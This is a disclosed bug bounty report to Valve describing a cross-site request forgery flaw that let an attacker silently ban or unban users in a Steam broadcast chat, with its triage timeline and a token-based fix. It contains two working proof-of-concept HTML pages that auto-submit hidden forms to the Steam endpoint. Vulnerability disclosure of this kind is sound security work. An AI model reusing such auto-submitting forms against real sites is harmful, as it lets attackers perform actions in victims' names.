CSRF | Ban or unban users in broadcast's chat
State Resolved (Closed)
Disclosed publicly 2019-01-07T20:07:39.180Z
Reported To
Weakness Cross-Site Request Forgery (CSRF)
Bounty $500


Timeline
romesful submitted a report to Valve.
2018-07-13T12:28:25.015Z

Steps to reproduce

  • Start broadcast
  • Attacker needs to craft special HTML page
  • Get the broadcast's Steam ID (it is contained in the URL: https://steamcommunity.com/broadcast/watch/{STEAM ID}/)
  • If the attacker wants to unban somebody, he needs to create an HTML page like this:
<html>
<head>
    <title>Unban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was unbanned silently :/</h1>
<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO UNBAN}">
<input type="hidden" name="bantype" value="0">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="0">
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
  • If the attacker wants to permanently ban somebody, he needs to create an HTML page like this:
<html>
<head>
    <title>Ban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was banned silently :/</h1>
<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO BAN}">
<input type="hidden" name="bantype" value="1">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="1">
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
  • After that, the broadcast's creator needs to visit the attacker's page.
  • And somebody will be banned/unbanned.

Video PoC

*I banned myself, because I don't have a third Steam account.

Fix

Add a sessionid parameter to the POST request, as is implemented in other requests.

Impact

Attacker can permanently ban or unban other users.

Regards,
Frans
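A server-side version of the fix the report asks for, as an added example that is not Valve's code and not part of the report: the handler for the endpoint named above accepts the ban fields only when the POSTed sessionid matches the caller's session cookie, so the PoC form, which cannot carry that value, is refused. The cookie name and the handler shape are assumptions.

```python
# Added example (not Valve's or the reporter's code): a server-side check for
# the fix the report asks for, a per-session CSRF token ("sessionid") sent in
# the POST body that must equal the caller's session cookie. Endpoint and field
# names come from the report; handler shape and cookie name are assumptions.
import hmac
import secrets

class CsrfError(Exception):
    """Raised when a state-changing POST lacks a valid sessionid token."""

def issue_sessionid() -> str:
    """Mint a random token per login and set it as the sessionid cookie; a
    cross-origin page cannot read that cookie, so it cannot copy it into a form."""
    return secrets.token_hex(12)

def verify_sessionid(cookies: dict, form: dict) -> None:
    """Synchronizer-token check: the form value must equal the cookie value."""
    cookie_token, form_token = cookies.get("sessionid"), form.get("sessionid")
    if not cookie_token or not form_token:
        raise CsrfError("missing sessionid")
    if not hmac.compare_digest(cookie_token, form_token):  # constant-time compare
        raise CsrfError("sessionid mismatch")

def ajax_update_user_mute(cookies: dict, form: dict) -> dict:
    """Assumed handler for /broadcast/ajaxupdateusermute/: CSRF check first, then
    parse the ban fields; if the check fails nothing is changed."""
    verify_sessionid(cookies, form)
    return {"chattersteamid": form["chattersteamid"], "bantype": int(form["bantype"]),
            "duration": int(form["duration"]), "perm": int(form["perm"])}

# Constructed requests. The broadcaster's browser attaches the cookie to both,
# which is why the cookie alone says nothing about who built the form.
BROADCASTER_COOKIES = {"sessionid": issue_sessionid()}
# Fields of the forged form from the report: no sessionid, since the attacker's
# page cannot read the victim's cookie to fill it in.
FORGED_FORM = {"broadcaststeamid": "{STEAM ID}", "issuersteamid": "{STEAM ID}",
               "chattersteamid": "{USER'S STEAM ID TO BAN}",
               "bantype": "1", "duration": "0", "perm": "1"}
# The same submission from Steam's own page, which can embed the token.
LEGIT_FORM = dict(FORGED_FORM, sessionid=BROADCASTER_COOKIES["sessionid"])

def forged_request_rejected() -> bool:
    """True when the report's PoC form is refused by the hardened handler."""
    try:
        ajax_update_user_mute(BROADCASTER_COOKIES, FORGED_FORM)
    except CsrfError:
        return True
    return False
```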

pieceoftoast Activities::Comment
2018-07-17T16:30:53.538Z
Hi @romesful , Thanks for your submission. We are currently reviewing your report and will get back to you once we have additional information to share. Kind regards, @pieceoftoast


pieceoftoast Activities::ReportSeverityUpdated
2018-07-17T17:30:56.876Z


pieceoftoast Activities::BugTriaged
2018-07-17T17:31:00.489Z
@romesful, thank you for your submission! Your report has been validated, and it has been submitted to the appropriate remediation team for review. They will let the HackerOne triage team know the final ruling on this report, and if/when a fix will be implemented. The HackerOne triage team will follow-up after the remediation team has assessed the impact of this report. Please note that the status and severity are subject to change.


romesful Activities::Comment
2018-07-23T11:56:40.451Z
Any updates?


Activities::BountyAwarded
2018-07-31T23:54:21.666Z


chrisk Activities::BugResolved
2018-07-31T23:54:37.260Z
Thanks for the report, we have deployed a fix for the issue.


romesful Activities::AgreedOnGoingPublic
2018-10-08T18:42:36.288Z
I want to disclose this one. Can we do it?


bgilmore Activities::AgreedOnGoingPublic
2019-01-07T20:07:39.139Z


bgilmore Activities::ReportBecamePublic
2019-01-07T20:07:39.204Z